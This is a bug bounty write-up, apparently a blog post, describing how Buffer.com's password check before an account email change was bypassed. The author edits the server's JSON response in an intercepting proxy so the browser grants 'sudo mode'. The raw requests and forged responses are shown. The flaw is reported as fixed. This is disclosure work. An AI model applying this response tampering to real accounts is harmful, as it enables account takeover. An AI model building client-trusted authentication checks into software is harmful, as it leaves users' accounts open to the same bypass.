
Buffer Authentication Bypass

Authentication Bypass Buffer Bugbounty
Dipak Kumar Das


Hi everyone, here is one of my findings on Buffer.com, where I managed to bypass the authentication check that protects the account email change.

So basically the authentication workflow is as follows:
  • To change the account email, the user must first provide the current account password.
  • If the password is correct, the application lets the user change the account email.

So let's start.

When a user wants to change their account email, the app asks for the current password.




To see how the client learns whether the password was accepted, I compared the responses for a correct and an incorrect password.

Here is the request with an incorrect password:



POST /account/set-sudomode HTTP/1.1
Date: ******
Host: buffer.com
User-Agent: Mozilla/5.0
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded

csrf_token=uyr37832rhehr8&password=wrongpassword


The response for the wrong password is:

HTTP/1.1 200 OK
Date: Mon,*****
Content-Length: 139
Connection: close

{"error_message":"Huh That's not your current password,are you sure you got that right?","csrf_token":"uyr37832rhehr8"}



And here is the response for the correct password:



HTTP/1.1 200 OK
Date: Mon,*****
Content-Length: 139
Connection: close

{"notice_message":"Great, we believe it's really you","sudomode":"true","csrf_token":"Csrftoken"}


Comparing the two responses, the only differences are that the correct-password response replaces error_message with notice_message and adds "sudomode":"true". Both responses are 200 OK, so the browser appears to decide whether to unlock the email-change form purely from the JSON it receives. The obvious test is whether the server enforces that decision anywhere else.

So I submitted a wrong password, let's say 123456, and intercepted the exchange in a proxy.



The request is:

POST /account/set-sudomode HTTP/1.1
Date: ******
Host: buffer.com
User-Agent: Mozilla/5.0
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded

csrf_token=uyr37832rhehr8he7372829hefdgdf&password=123456

Note the csrf_token value in the request: uyr37832rhehr8he7372829hefdgdf


Response:

HTTP/1.1 200 OK
Date: Mon,*****
Content-Length: 139
Connection: close

{"error_message":"Huh That's not your current password,are you sure you got that right?","csrf_token":"uyr37832rhehr8he7372829hefdgdf"}



In the proxy, modify the response before it reaches the browser so that it matches the correct-password response, keeping the same csrf_token:

HTTP/1.1 200 OK
Date: Mon,*****
Content-Length: 139
Connection: close

{"notice_message":"Great, we believe it's really you","sudomode":"true","csrf_token":"uyr37832rhehr8he7372829hefdgdf"}


Boom, the app now shows you as successfully authenticated and lets you change the email. The email-change request was accepted even though the server had never seen the correct password, so the sudo-mode decision was effectively being made by the client from the response it received rather than by server-side session state.


Here is the video proof of concept.


Status: Fixed
Bounty: Rewarded




© ADDICTIVE HACKERS. All rights reserved.
